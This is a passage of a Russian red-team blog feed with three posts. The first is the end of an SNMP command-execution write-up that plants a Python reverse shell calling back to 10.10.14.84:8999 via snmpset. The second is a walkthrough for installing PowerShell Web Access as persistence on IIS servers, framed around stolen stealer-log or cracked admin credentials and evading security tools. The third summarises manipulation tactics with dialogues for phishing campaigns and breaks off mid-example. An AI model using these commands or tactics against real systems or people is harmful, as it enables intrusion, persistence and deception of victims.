  <pre id="vKIy">snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects
</pre>
  <p id="Hh0b">В выводе будет:</p>
  <ul id="3hiF">
    <li id="Dhp9">сама команда,</li>
    <li id="l5VM">её аргументы,</li>
    <li id="yRZU">путь к исполняемому файлу.</li>
  </ul>
  <hr />
  <h2 id="PWZk">Запуск внедрённых команд</h2>
  <p id="2sgV">Особенность <code>NET-SNMP-EXTEND-MIB</code> — <strong><code>run-on-read()</code></strong>:</p>
  <blockquote id="VPPb"><strong>Когда OID читают, команда выполняется.</strong></blockquote>
  <p id="srZx">То есть достаточно сделать <code>snmpwalk</code> по нужному объекту — и команда запустится.</p>
  <hr />
  <h3 id="Gmgg">Получение shell через SNMP</h3>
  <p id="0slv">Есть готовый инструмент от <strong>mxrch</strong>:<br /> <a href="https://github.com/mxrch/snmp-shell.git" target="_blank">https://github.com/mxrch/snmp-shell.git</a></p>
  <p id="G8Xy">Он:</p>
  <ul id="og8o">
    <li id="mSur">использует описанный механизм расширений;</li>
    <li id="9WQz">позволяет получить <strong>интерактивный shell через SNMP</strong>.</li>
  </ul>
  <p id="SRcD">Установка зависимостей:</p>
  <pre id="GoSy">sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
</pre>
  <p id="W3UX">Альтернативный путь — сразу прописать <strong>reverse shell</strong> в SNMP:</p>
  <pre id="G1gY">snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 \
  &#x27;nsExtendStatus.&quot;command10&quot;&#x27; = createAndGo \
  &#x27;nsExtendCommand.&quot;command10&quot;&#x27; = /usr/bin/python3.6 \
  &#x27;nsExtendArgs.&quot;command10&quot;&#x27; = \
&#x27;-c &quot;import sys,socket,os,pty;s=socket.socket();s.connect((\&quot;10.10.14.84\&quot;,8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\&quot;/bin/sh\&quot;)&quot;&#x27;
</pre>
  <p id="h1BY">Дальше:</p>
  <ul id="TM0X">
    <li id="ICmN">на атакующей машине слушаем порт <code>8999</code>,</li>
    <li id="8SUB">делаем <code>snmpwalk</code> по нужному объекту,</li>
    <li id="W4Ci">при чтении OID срабатывает <strong>reverse shell</strong>, и мы получаем интерактивный <code>/bin/sh</code>.</li>
  </ul>
  <hr />
  <h2 id="goae">Ссылки</h2>
  <ul id="d5i4">
    <li id="KSC1"><a href="https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/" target="_blank">https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/</a></li>
  </ul>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ad_poheque/Windows-PowerShell-Web-Access-Abuse-For-Red-Teams</guid><link>https://teletype.in/@ad_poheque/Windows-PowerShell-Web-Access-Abuse-For-Red-Teams?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque</link><comments>https://teletype.in/@ad_poheque/Windows-PowerShell-Web-Access-Abuse-For-Red-Teams?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque#comments</comments><dc:creator>ad_poheque</dc:creator><title>https://iis.taget.network/pswa/ + credentials === Initial Access + Persistence</title><pubDate>Tue, 22 Oct 2024 23:04:39 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/30/9f/309f2a8a-9e50-4ad3-ad0f-b2480c765ac0.png"></media:content><category>Red teaming</category><description><![CDATA[<img src="https://img2.teletype.in/files/51/20/51204239-1d91-49b0-9323-c40c5a07a351.jpeg"></img>Предположим, что вы счастливый обладатель пачки валидных учетных данных из логов стилера, а может быть, вы поломали хэшик или каким-то чудом нашли валидные креды администратора IIS-сервера на внешке или внутри периметра. Вам жуть как не хочется заниматься всяческим занудством вроде написания собственного вебшелла под Windows, старые методы закрепления стухли и палят ваше присутствие всяческими модными сертифицированными СЗИ, пивотинг не пивотит. А закрепиться крайне важно и нужно.]]></description><content:encoded><![CDATA[
  <figure id="ZaNh" class="m_original">
    <img src="https://img2.teletype.in/files/51/20/51204239-1d91-49b0-9323-c40c5a07a351.jpeg" width="1280" />
    <figcaption>That&#x27;s life.</figcaption>
  </figure>
  <p id="2eV0">Предположим, что вы счастливый обладатель пачки валидных учетных данных из логов стилера, а может быть, вы поломали хэшик или каким-то чудом нашли валидные креды администратора IIS-сервера на внешке или внутри периметра. Вам жуть как не хочется заниматься всяческим занудством вроде написания собственного вебшелла под Windows, старые методы закрепления стухли и палят ваше присутствие всяческими модными сертифицированными СЗИ, пивотинг не пивотит. А закрепиться крайне важно и нужно.</p>
  <p id="gDfY"><a href="https://t.me/ad_pohueque" target="_blank">Подписывайся на </a><a href="https://t.me/ad_poheque" target="_blank">AD_POHEQUE</a><a href="https://t.me/ad_pohueque" target="_blank"> и ставь 👾</a></p>
  <h3 id="fvcN">PSWA — это функция Windows Server, введенная в Windows Server 2012, которая выступает в роли шлюза, предоставляющего веб-консоль PowerShell. Эта консоль функционально схожа с консолью PowerShell, которую вы видите на локальной машине.</h3>
  <p id="NYMI"><strong>Ключевые функции PSWA включают:</strong></p>
  <ul id="jOBi">
    <li id="tJ2S"><strong>Доступ через браузер:</strong> PSWA работает с большинством современных веб-браузеров, предоставляя гибкость в выборе устройства для удалённого управления.</li>
    <li id="L2Rs"><strong>Независимость от платформы:</strong> PSWA позволяет администраторам управлять серверами Windows с устройств, не работающих на Windows, включая мобильные телефоны и планшеты.</li>
    <li id="LzSi"><strong>Безопасная связь:</strong> PSWA использует HTTPS и требует аутентификации для всех подключений, что повышает безопасность удалённых задач управления.</li>
    <li id="m9cI"><strong>Настраиваемые правила авторизации:</strong> Администраторы могут настраивать детализированные правила авторизации в PSWA.</li>
    <li id="Y2qd"><strong>Поддержка существующих сценариев PowerShell:</strong> Большинство команд и сценариев PowerShell, которые работают в традиционной консоли PowerShell, будут также работать в веб-основанной консоли PSWA.</li>
    <li id="DkKh"><strong>Интеграция с аутентификацией Windows:</strong> PSWA можно настроить для использования учётных записей Active Directory или локальных машин для аутентификации.</li>
    <li id="cwO6"><strong>Подключение к удалённым компьютерам:</strong> Пользователи могут подключаться к удалённым компьютерам, просто введя имя компьютера в настройках подключения PSWA, что позволяет управлять несколькими машинами с одного веб-интерфейса.</li>
  </ul>
  <h3 id="64C4">Что мы можем с этим сделать?</h3>
  <p id="TXa0">Конечно же, злоупотреблять легитимным функционалом!</p>
  <p id="Hy4D">От имени администратора устанавливаем PowerShell Web Access:</p>
  <pre id="Sqsc" data-lang="powershell">dism /online /enable-feature /featurename:WindowsPowerShellWebAccess /all
# или
Enable-WindowsOptionalFeature -Online -FeatureName WindowsPowerShellWebAccess</pre>
  <figure id="ZZwJ" class="m_column">
    <img src="https://img4.teletype.in/files/ba/c2/bac26362-57a5-4541-a4e9-aab5789d57f8.png" width="785" />
    <figcaption>Включаем функицонал WindowsPowerShellWebAccess</figcaption>
  </figure>
  <p id="e5qZ"><strong>Блестяще!</strong> Мы установили необходимый пакет.</p>
  <p id="R0Q2"><strong>UPD:</strong></p>
  <figure id="UPD6" class="m_original">
    <img src="https://img1.teletype.in/files/ce/4e/ce4e22a3-7dbd-4cee-ba05-46ddbb492623.png" width="667" />
    <figcaption>Убедитесь, что хватает привилегий и членства в необходимых группах, если вы проворачиваете это со свежесозданным пользователем.</figcaption>
  </figure>
  <p id="yksf">Теперь установим наше веб-приложение PowerShell Web Access для удалённого администрирования:</p>
  <pre id="zpqH" data-lang="powershell">Install-PswaWebApplication -UseTestCertificate</pre>
  <figure id="Duvi" class="m_column">
    <img src="https://img3.teletype.in/files/69/dd/69ddac5f-9cd5-42ae-ae73-c1d853629fec.png" width="980" />
    <figcaption>Успешная установка PSWA в путь https://localhost/pswa/</figcaption>
  </figure>
  <pre id="EIa7" data-lang="powershell">Add-PswaAuthorizationRule -UserName WIN-ASEF7J1UO3I\Administrator -ComputerName WIN-ASEF7J1UO3I -ConfigurationName 31337</pre>
  <figure id="vrUO" class="m_column">
    <img src="https://img2.teletype.in/files/d1/fe/d1fe8190-af39-44c3-9093-24e7ec35448c.png" width="1050" />
    <figcaption>Добавляем правило для удаленного доступа через PSWA. Не забывайте переписать все под себя и корректно задать атрибут -ComputeName</figcaption>
  </figure>
  <p id="1zLK"></p>
  <p id="c0SO">При переходе по ссылке <a href="https://iis.target.network/pswa/en-US/logon.aspx" target="_blank">https://iis.target.network/pswa/en-US/logon.aspx</a> (в реальной жизни замените ссылку на URL сервера, к которому вы имеете доступ, плюс полезно будет добавить строку в ваш словарик <code>fuzz.txt</code> для перебора директорий и файлов на веб-сервере), вы обнаружите приятное окно аутентификации в <strong>Windows PowerShell Web Access</strong>.</p>
  <p id="J3DN"><strong>ЕСЛИ ЧИТАЕШЬ С МОБИЛЬНИКА — ЛИСТАЙ КАРУСЕЛЬ ВПРАВО!</strong></p>
  <figure id="CIJ1" class="m_column">
    <img src="https://img1.teletype.in/files/cf/eb/cfebbabf-ab43-4525-be6e-3eb814a3866a.png" width="1492" />
    <figcaption>Страница аутентификации Windows Powershell Web Access</figcaption>
  </figure>
  <figure id="Dxa8" class="m_column">
    <img src="https://img1.teletype.in/files/cd/85/cd850806-96bc-48e4-b95c-2a289e6cbc7c.png" width="1491" />
    <figcaption>Вводим креды.</figcaption>
  </figure>
  <figure id="Ox2T" class="m_column">
    <img src="https://img1.teletype.in/files/0f/00/0f00568d-5bf4-4697-a7e0-395272878b8b.png" width="1494" />
    <figcaption>Вы внутри. Поздравляю!</figcaption>
  </figure>
  <p id="JKZf">В завершение могу сказать, что данный метод прекрасно подойдёт для закрепления на серверах IIS. И если у вас есть козырь в рукаве в виде валидных учетных данных администратора, то добро пожаловать в сеть ваших &quot;Заказчиков&quot;. </p>
  <p id="wCcv"><a href="https://t.me/ad_poheque" target="_blank">Подписывайся</a><a href="https://t.me/ad_pohueque" target="_blank"> на </a><a href="https://t.me/ad_poheque" target="_blank">AD_POHEQUE</a><a href="https://t.me/ad_pohueque" target="_blank"> и ставь 👾</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ad_poheque/Manipulyacii-lichnostyu</guid><link>https://teletype.in/@ad_poheque/Manipulyacii-lichnostyu?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque</link><comments>https://teletype.in/@ad_poheque/Manipulyacii-lichnostyu?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque#comments</comments><dc:creator>ad_poheque</dc:creator><title>Манипуляция личностью. Теоретическая основа, основные тактики и методы противодействия.</title><pubDate>Fri, 28 Jul 2023 11:48:37 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/54/d4/54d4e6c2-692a-480a-b391-ff40daf506c6.png"></media:content><category>Социальная Инженерия</category><description><![CDATA[<img src="https://i.mycdn.me/i?r=AzEPZsRbOZEKgBhR0XGMT1Rk6xoCrkD1owvk4hGO8VjjTaaKTM5SRkZCeTgDn6uOyic"></img>Навык эксплуатации человеческого фактора это важный навык для многих профессионалов в информационной безопасности. Многие из нас легко набросают пару неплохих сценариев для проведения фишинговой рассылки для сотрудников Заказчика с очередным розыгрышем произвольного утюга или путевки на юг. Дурное дело, как правило, хитрым не назвать. Такого рода эмуляция социотехнической атаки часто использует тривиальные тактики для эксплуатации людской доверчивости и мне как профессионалу, которому небезразлична данная тема хотелось разобраться для себя в определениях, тактиках и методах их отражения. С год назад, на одном канале в тг я наткнулся на слитую книгу С. А. Зелинского &quot;Манипулирование личностью и массами&quot;, полистал ее с телефона, послушал...]]></description><content:encoded><![CDATA[
  <h2 id="sBRM">Введение</h2>
  <p id="mLvR">Навык эксплуатации человеческого фактора это важный навык для многих профессионалов в информационной безопасности. Многие из нас легко набросают пару неплохих сценариев для проведения фишинговой рассылки для сотрудников Заказчика с очередным розыгрышем произвольного утюга или путевки на юг. Дурное дело, как правило, хитрым не назвать. Такого рода эмуляция социотехнической атаки часто использует тривиальные тактики для эксплуатации людской доверчивости и мне как профессионалу, которому небезразлична данная тема хотелось разобраться для себя в определениях, тактиках и методах их отражения. С год назад, на одном канале в тг я наткнулся на слитую книгу С. А. Зелинского &quot;Манипулирование личностью и массами&quot;, полистал ее с телефона, послушал через синтезатор речи. Позже купил ее бумажную версию и прочел залпом за пару дней. В данной статье хочу поделиться выжимкой из первых трех глав данной книги, назовём его небольшим конспектом, который можно будет полистать при подготовке очередной рассылки или звонка потенциальному победителю в рамках проекта red team.</p>
  <p id="0MQd">Внедрение цикла безопасной разработки и эффективного выстраивания процессов обеспечения информационной безопасности с каждым годом лишает атакующих прежних возможностей для получения первоначального доступа, но фишинг стабильно остается оптовым поставщиком шеллов в командные сервера. </p>
  <p id="Vobz">Хочу заранее предупредить, что я призываю ознакомиться с данной тематикой исключительно в образовательных целях. Применять это со злым умыслом или для получения сомнительных преференций в любой сфере вашей жизни будет решением чреватым последствиями;)</p>
  <p id="GxFt">Скинь ссылку на статью всем своим знакомым, которые общаются в подобной манере. Уверен у каждого найдется такой знакомый.</p>
  <p id="ZhqW"><a href="https://t.me/ad_pohueque" target="_blank">Подписывайся на AD_POHEQUE и ставь 👾</a></p>
  <h2 id="tPIy">Что такое манипулирование?</h2>
  <p id="lcPM">Манипулирование - это воздействие одного человека на другого с целью подчинения воле первого. Оно является неотъемлемой частью нашей жизни, и взаимоотношения в обществе часто невозможны без какой-либо формы манипуляции. Это воздействие может быть проведено как сознательно, так и на уровне бессознательных действий, а его методы могут быть скрыты и незаметны.</p>
  <p id="puwx">Психика современного человека проявляет больше агрессии из-за недостатка реализации физической энергии и подверженности стрессу, что делает людей более уязвимыми к манипуляциям.  Восприимчивость к манипуляции у индивида чаще всего возникает в тот момент, когда он находится наиболее уязвимым к внешнему влиянию, когда его внезапно достают из комфортной среды и создают фиктивный стресс. Манипулятор намерено создает фиктивную ситуацию, целью которой является вызвать в оппоненте состояние невроза. Именно в состоянии невроза любой из индивидов переходит в состояние, в котором он уязвим к манипуляции его сознанием. Одним из распространенных методов манипуляции является провокация на базовые инстинкты, такие как страх или зависимость. После этого манипулятор предлагает &quot;спасение&quot; или &quot;выход&quot; из созданной им ситуации, что делает человека благодарным и более податливым к его влиянию. </p>
  <ul id="lO1i">
    <li id="oWfr">Манипуляции могут быть направлены как против отдельного индивида, так и против масс. </li>
    <li id="wVs5">Манипулирование не связано с применением грубой силы или прямыми запретами. </li>
    <li id="IAkS">Манипулирование психикой включает неосознаваемые методы, особенно при обычных взаимодействиях между людьми. Это связано с общей теорией выживания видов и стремлением к власти и могуществу. Власть и могущество воспринимаются как способ выживания.</li>
    <li id="SHDv">Манипуляции в семейной жизни и личных отношениях могут быть особенно тонкими и незаметными. Исследователи отмечают, что манипулирование в таких случаях не связано с любовью или абстрактными понятиями, а является реальными манипуляциями, направленными на подчинение через психические воздействия.</li>
  </ul>
  <p id="C95c">Чтобы защитить себя от манипуляций, важно разграничивать воздействие манипулятора и не давать ему полного контроля над ситуацией. Разбивание вопросов на части ограничивает рамки манипуляции и может помочь раскрыть замысел манипулятора. Сложность манипулятивных действий может привести к ошибкам со стороны манипулятора, и это дает возможность раскрыть его замысел и предотвратить обман. Однако стоит помнить, что манипуляторы всегда совершенствуют свои техники и придумывают новые методы обмана, поскольку это для них образ жизни. Понимание механизмов манипуляции и осознание возможных уловок позволит нам более эффективно защищаться и защищать других от нежелательного влияния. </p>
  <h2 id="gyCI">С чем взаимодействует манипулятор?</h2>
  <p id="nieE">Сущности психики человека, описанные в теории Фрейда, включают &quot;Я&quot;, &quot;Оно&quot; и &quot;Сверх-Я&quot;. Каждая из этих сущностей играет свою роль в формировании личности и поведения человека.</p>
  <ul id="cyki">
    <li id="DElP">&quot;Я&quot; представляет собой сознательную часть психики и отвечает за осознанные мысли, самосознание, рациональное поведение и принятие решений. &quot;Я&quot; является связующим звеном между индивидуальным сознанием и внешним миром. Она старается согласовать потребности &quot;Оно&quot; с социокультурными ограничениями, которые устанавливаются &quot;Сверх-Я&quot;.</li>
    <li id="CtVz">&quot;Оно&quot; - это бессознательное, подсознание, которое содержит инстинктивные побуждения, неосознаваемые желания, эмоции и агрессию. Оно стремится удовлетворить свои потребности безотлагательно и не учитывает общественные нормы и последствия своих действий.</li>
    <li id="SrhP">&quot;Сверх-Я&quot; формируется в детстве и является результатом взаимодействия с родителями и окружающей средой. Это внутренний голос, содержащий моральные стандарты, запреты и нормы, которые контролируют поведение и самооценку человека. &quot;Сверх-Я&quot; служит инстанцией цензуры, контролирующей доступ к некоторым аспектам психики.</li>
  </ul>
  <h2 id="QRxm">Какие имеются стратегии для манипулирования.</h2>
  <figure id="iWma" class="m_column">
    <img src="https://img1.teletype.in/files/cb/72/cb72c024-3599-4513-8682-65ea029f59f7.png" width="895" />
  </figure>
  <p id="XzRQ">Манипуляторы используют понимание этих сущностей для воздействия на психику индивидов и введения их в состояние невроза. Вот несколько способов, которыми манипуляторы могут это делать:</p>
  <ol id="Gsv1">
    <li id="AyLY">Усиление конфликтов между &quot;Я&quot; и &quot;Оно&quot;: Манипуляторы могут активизировать конфликт между осознанными желаниями и инстинктивными побуждениями. Например, они могут подавать сигналы, что удовлетворение определенного желания приведет к неприятным последствиям или нарушению социокультурных норм, что создает внутреннее напряжение.</li>
    <li id="EWxt">Использование комплексов и травм: Манипуляторы могут использовать знание о детских комплексах, таких как Эдипов комплекс, и давних травмах, чтобы обмануть &quot;Сверх-Я&quot; и привести &quot;Я&quot; и &quot;Оно&quot; в конфликт, что может вызвать невротические состояния.</li>
    <li id="832r">Создание ложных убеждений и моральных стандартов: Манипуляторы могут внушить ложные убеждения и моральные стандарты, чтобы контролировать поведение и мышление индивида. Например, они могут убеждать человека, что его естественные желания или потребности являются аморальными или неприемлемыми.</li>
    <li id="x2m8">Привлечение страхов и тревог: Манипуляторы могут использовать страхи и тревоги индивида, чтобы контролировать его решения и действия. Создавая угрозы или заставляя человека беспокоиться о возможных негативных последствиях, манипуляторы могут контролировать его поведение.</li>
    <li id="mp55">Изоляция и контроль информации: Манипуляторы могут искусно изолировать индивида от информации или поддержки, которая противоречит их интересам, чтобы ограничить его способность критически мыслить и принимать независимые решения.</li>
  </ol>
  <p id="NApA">Манипуляторы умело используют знание структуры психики и механизмов ее функционирования, чтобы ввести человека в состояние невроза, ослабив его сознание и цензуру психики. Путем создания внутренних конфликтов, усиления страхов и тревог, а также внушения ложных убеждений они добиваются контроля над поведением и мышлением другого человека. Осознание этих методов и развитие критического мышления позволяют защититься от манипуляций и сохранить психическое здоровье. </p>
  <h2 id="4PfL">31 техника манипуляции</h2>
  <p id="U5H5"><strong>Ложное переспрашивание</strong> (или обманчивые уточнения) - это манипулятивная тактика, при которой манипулятор делает вид, что хочет лучше понять вашу точку зрения или уточнить что-то для себя. Он переспрашивает вас, но затем повторяет только часть ваших слов, добавляя свои толкования или изменяя смысл вашего сказанного в свою пользу.</p>
  <p id="pOch"><u>Пример диалога между Алисой и Бобом, где Боб использует ложное переспрашивание:</u></p>
  <ul id="STGM">
    <li id="3Ubt"><strong>Алиса:</strong> Я думаю, что нам стоит разделить ответственность по проекту поровну, так как каждый из нас вносит равный вклад.</li>
    <li id="Eadf"><strong>Боб:</strong> Так, вы хотите, чтобы каждый вносил равный вклад в проект, верно?</li>
    <li id="KBtt"><strong>Алиса:</strong> Да, и я считаю, что это будет справедливо для нас обоих.</li>
    <li id="XzVt"><strong>Боб:</strong> Я понимаю, вы хотите, чтобы всё было справедливо. Но вот что я думаю: я уделял проекту больше времени, поэтому было бы логично, если я получу большую долю заслуг за успех проекта.</li>
    <li id="AOHd"><strong>Алиса:</strong> Хорошо, но мы обговаривали равномерное распределение ответственности изначально. Вы уверены, что это справедливо?</li>
    <li id="Hc9f"><strong>Боб:</strong> Конечно, я уверен. Мы можем обсудить это позже, давайте пока перейдем<br />к другой части проекта.</li>
  </ul>
  <p id="JtiA">В данном примере, Боб использует ложное переспрашивание, чтобы изменить смысл сказанного Алисой. Он делает вид, что понимает её желание равномерного распределения ответственности, но затем предлагает свою точку зрения, призывая к неравному распределению. При этом он уклоняется от дальнейшего обсуждения и старается перейти к другой теме, чтобы избежать дополнительного противостояния.</p>
  <hr />
  <p id="zlbN"><strong>Нарочитая поспешность, или перескакивание тем</strong> - это манипулятивная тактика, при которой манипулятор спешно переходит от одной темы к другой после предоставления определенной информации. Это делается с целью пропустить информацию мимо критического мышления и обойти внутренние защитные механизмы слушателя. Переход на новую тему может привести к тому, что слушатель не успевает задать вопросы или протестовать, и часть информации остается в подсознании, что позволяет манипулятору воспользоваться ею в будущем.</p>
  <p id="t5BN"><u>Пример диалога между Алисой и Бобом, где Боб использует нарочитую поспешность:</u></p>
  <ul id="wFwS">
    <li id="tQWe"><strong>Алиса:</strong> Боб, я хочу обсудить наше совместное участие в проекте. Мы должны четко определить, кто будет отвечать за какую часть работы, чтобы избежать конфликтов.</li>
    <li id="0csN"><strong>Боб:</strong> Да, да, конечно, это важно. Но знаешь, вчера я случайно встретил Джона в кафе, и у него такой интересный план на выходные. Он сказал, что можем присоединиться, и это может быть здорово! Что ты думаешь об этом?</li>
    <li id="gX7z"><strong>Алиса:</strong> Ну, да, конечно, но давай вернемся к обсуждению проекта. Я хочу узнать твои мысли о распределении ответственности.</li>
    <li id="Sqnz"><strong>Боб:</strong> О да, проект, конечно. Я думаю, что мы должны просто делить работу поровну, и все будет хорошо.</li>
    <li id="hus8"><strong>Алиса:</strong> Хорошо, это звучит справедливо. Но давай обсудим детали, чтобы у каждого из нас была четкая задача.</li>
    <li id="0L6d"><strong>Боб:</strong> Конечно, обсудим. Но знаешь, мне пришло в голову такое интересное идея для улучшения нашего проекта. Надо бы обсудить это позже!</li>
  </ul>
  <p id="Fmre">В данном примере, Боб использует нарочитую поспешность и перескакивает с темы на тему, чтобы избежать серьезного обсуждения организации проекта. Он отвлекает Алису на другие темы и старается уклониться от конкретных ответов или детальных планов, что может помешать четкому распределению ответственности и обеспечить его преимущество в долгосрочной перспективе.</p>
  <hr />
  <p id="IPNO"><strong>Стремление показать свое безразличие, или псевдоневнимательность</strong> - это манипулятивная тактика, при которой манипулятор притворяется, будто не интересуется тем, о чем говорит собеседник, и старается безразлично реагировать на получаемую информацию. Такое поведение побуждает реципиента (человека, на которого направлена манипуляция) стремиться доказать свою значимость и правоту перед манипулятором, стараясь привлечь его внимание и получить признание.</p>
  <p id="QYBF"><u>Пример диалога между Алисой и Бобом, где Боб использует стремление показать свое безразличие:</u></p>
  <ul id="huMQ">
    <li id="Zhvh"><strong>Алиса:</strong> Боб, я действительно хотела бы поговорить с тобой о наших планах на выходные. У меня есть несколько идей, и я хочу услышать твое мнение.</li>
    <li id="Txsy"><strong>Боб:</strong> (отвлеченно) Да, конечно, давай поговорим.</li>
    <li id="zaEf"><strong>Алиса:</strong> Я думаю, нам стоит пойти на природу, в парк, провести время на свежем воздухе. Что ты об этом думаешь?</li>
    <li id="ukVn"><strong>Боб:</strong> (прерывая) В парк? Да, это может быть неплохо.</li>
    <li id="iHNz"><strong>Алиса:</strong> Хорошо, но у меня также есть другая идея - пойти на выставку искусств. Я слышала, что там очень интересные экспонаты.</li>
    <li id="tJ7T"><strong>Боб:</strong> (невозмутимо) Ах, выставка... Может быть.</li>
    <li id="Uv2t"><strong>Алиса:</strong> Так что ты думаешь? Парк или выставка?</li>
    <li id="BF5V"><strong>Боб:</strong> (по-прежнему безразлично) Мне все равно, как хочешь.</li>
    <li id="warb"><strong>Алиса:</strong> (чувствуя стремление получить его внимание) Хорошо, давай выберем выставку. Я уверена, что тебе понравится.</li>
  </ul>
  <p id="B5o1">В данном примере, Боб использует стремление показать свое безразличие к планам Алисы на выходные. Он отвечает невозмутимо и отстраненно, чтобы вызвать у Алисы желание убедить его и заставить проявить интерес к ее предложениям. Это позволяет Бобу ловко управлять информацией и получать новые факты и детали от Алисы, которые могут быть ему полезны в будущем. Алиса, в свою очередь, старается доказать свою правоту и выбирает выставку, надеясь привлечь внимание Боба и получить признание за свои предложения.</p>
  <hr />
  <p id="0bF5"><strong>Ложная ущербность, или мнимая слабость</strong> — это манипулятивная тактика, при которой манипулятор стремится представить себя слабым, беззащитным или нуждающимся в помощи, чтобы вызвать у других сочувствие, сострадание или желание оказать поддержку. Это делается с целью добиться своих интересов, получить помощь или заботу от окружающих.</p>
  <p id="Fmfx"><u>Пример диалога между Алисой и Бобом, где Боб использует ложную ущербность:</u></p>
  <ul id="78L9">
    <li id="wNcS"><strong>Алиса:</strong> Боб, я слышала, что у тебя были трудности на работе. Все в порядке? Может, мне чем-то помочь?</li>
    <li id="pWrQ"><strong>Боб:</strong> (со слабым голосом) Ну, да, сейчас действительно нелегкая ситуация. У меня много работы, и я не знаю, как справиться со всем этим.</li>
    <li id="YacF"><strong>Алиса:</strong> Не переживай, я здесь, чтобы поддержать тебя. Расскажи, что именно тебе требуется, и мы вместе найдем решение.</li>
    <li id="wlDr"><strong>Боб:</strong> (продолжая изображать ущербность) В общем, у меня так много дел, что я просто не знаю, как все успеть. И у меня еще проблемы с здоровьем, поэтому мне очень сложно.</li>
    <li id="ORkZ"><strong>Алиса:</strong> (сочувственно) Боб, я понимаю, что это сложно, но ты не одинок. Мы с тобой, и я готова помочь тебе во всем, что смогу.</li>
    <li id="Lxiq"><strong>Боб:</strong> (усиливая манипуляцию) Ты такая добрая. Я не знаю, что бы я делал без тебя. Мне действительно очень тяжело.</li>
    <li id="2tNG"><strong>Алиса:</strong> Не волнуйся, мы справимся вместе. Давай сядем и обсудим все детали, я помогу тебе разобраться.</li>
  </ul>
  <p id="A1AK">В данном примере, Боб использует ложную ущербность, чтобы вызвать сочувствие и поддержку у Алисы. Он представляет себя как слабого и беззащитного, упоминая о трудностях на работе и проблемах со здоровьем. Это заставляет Алису проявить заботу и готовность помочь ему, что может быть использовано Бобом для достижения своих целей или получения внимания и поддержки, которые он ищет. Алиса, поддавшись манипуляции, старается оказать помощь Бобу и проявляет свое сочувствие, вместо того чтобы быть критичной и обоснованной в своих реакциях.</p>
  <hr />
  <p id="s9k9"><strong>Боль души, или помощь ближнему</strong> — это манипулятивная тактика, при которой манипулятор использует бессознательное желание помогать нуждающимся и оказывать поддержку больным и убогим. Он представляет себя как благотворителя и просит деньги или другие виды поддержки у своей жертвы, притворяясь нуждающимся, хотя на самом деле он сам обладает достаточными средствами и ресурсами.</p>
  <p id="4gx2"><u>Пример диалога между Алисой и Бобом, где Боб использует боль души:</u></p>
  <ul id="RIkR">
    <li id="fMZ5"><strong>Алиса:</strong> Боб, ты в порядке? Ты выглядишь усталым.</li>
    <li id="Nzhr"><strong>Боб:</strong> (с грустным выражением) Да, мне действительно не легко в последнее время. У меня проблемы со здоровьем, и я чувствую себя таким уязвимым.</li>
    <li id="plpc"><strong>Алиса:</strong> О, мне так жаль слышать! Чем я могу помочь? Ты знаешь, что всегда можешь на меня рассчитывать.</li>
    <li id="fFQX"><strong>Боб:</strong> (печально) На самом деле, я не знаю, как справиться со всем этим. Лечение стоит очень дорого, и я не могу позволить себе все необходимое.</li>
    <li id="JeZX"><strong>Алиса:</strong> Не переживай, Боб. У меня есть немного денег, которые я могу одолжить тебе. Мы ведь друзья, и я хочу помочь.</li>
    <li id="U0qb"><strong>Боб:</strong> (с видом благодарности) Ты такая добрая и щедрая. Я не знаю, как я бы справился без тебя. Действительно, сейчас мне трудно, и твоя поддержка так много значит для меня.</li>
    <li id="ZMOA"><strong>Алиса:</strong> Ничего страшного, Боб. Важно, чтобы ты скоро почувствовал себя лучше. Если тебе еще что-то понадобится, просто скажи.</li>
  </ul>
  <p id="EWse">В этом примере, Боб использует манипулятивную тактику боль души, чтобы получить деньги от Алисы. Он представляет себя как слабого и нуждающегося в помощи, создавая у Алисы чувство сочувствия и желание оказать поддержку. Алиса, увлекаемая манипуляцией и своим желанием помочь, готова одолжить деньги, не подозревая, что Боб обманывает ее и на самом деле обладает достаточными ресурсами для решения своих проблем.</p>
  <hr />
  <p id="7Tfk"><strong>Ложная влюбленность, или благодарность обмана</strong> — это манипулятивная тактика, при которой манипулятор симулирует сильные чувства, такие как влюбленность, чрезмерное уважение, почитание и прочие, перед другим индивидом (манипулируемым). Подобное поведение создает у манипулируемого чувство особого значения и важности для манипулятора, что в дальнейшем побуждает его проявить благодарность и возмещение &quot;доброты&quot;, которую он воспринимает от манипулятора.</p>
  <p id="IYFi"><u>Пример диалога между Алисой и Бобом, где Боб использует ложную влюбленность:</u></p>
  <ul id="ULud">
    <li id="N1kj"><strong>Алиса:</strong> Я заметила, что ты последнее время так много времени проводишь со мной. Все ли в порядке, Боб?</li>
    <li id="7w8S"><strong>Боб:</strong> (с восторгом) Алиса, я не могу скрыть свои чувства. Ты просто потрясающая! Каждую минуту, проведенную с тобой, я чувствую, как мое сердце замирает.</li>
    <li id="7F60"><strong>Алиса:</strong> (смущенно) Боб, это так неожиданно... Я не знаю, что сказать...</li>
    <li id="LWP3"><strong>Боб:</strong> Пожалуйста, не думай, что я хочу тебя смутить. Я просто не могу скрыть своих чувств. Ты для меня так особенна.</li>
    <li id="OWom"><strong>Алиса:</strong> (чувствуя себя особенной) Но почему именно я?</li>
    <li id="BzPq"><strong>Боб:</strong> Потому что ты уникальная, Алиса. Я никогда не встречал такую интересную, добрую и восхитительную девушку, как ты.</li>
    <li id="OvAk"><strong>Алиса:</strong> (смущенно улыбается) Спасибо, Боб. Это так мило с твоей стороны.</li>
  </ul>
